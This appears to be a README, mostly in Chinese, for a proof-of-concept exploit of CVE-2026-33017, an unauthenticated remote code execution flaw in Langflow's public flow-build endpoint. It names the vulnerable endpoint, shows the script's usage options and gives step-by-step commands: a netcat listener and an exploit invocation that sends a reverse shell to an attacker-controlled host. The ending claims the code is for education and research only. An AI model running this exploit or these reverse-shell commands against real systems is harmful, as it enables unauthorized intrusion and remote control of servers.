
CVE-2026-33017 Exploit | by infrar3d
xpl0ited by infrar3d
本概念验证利用针对 Langflow 1.9.0 之前版本中的一个严重远程代码执行(RCE)漏洞。该漏洞允许未经身份验证的攻击者通过向流程构建 API 端点注入恶意 Python 代码来执行任意系统命令。漏洞存在于 /api/v1/build_public_tmp/{flow_id}/flow 端点中,该端点未能正确清理组件模板中 code 字段的用户提供代码。
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
第一个终端(监听端):
nc -lvnp 4444
第二个终端(利用端):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
本软件及概念验证代码仅供教育和研究目的使用。
您有责任遵守所有适用法律。请合乎道德且负责任地使用。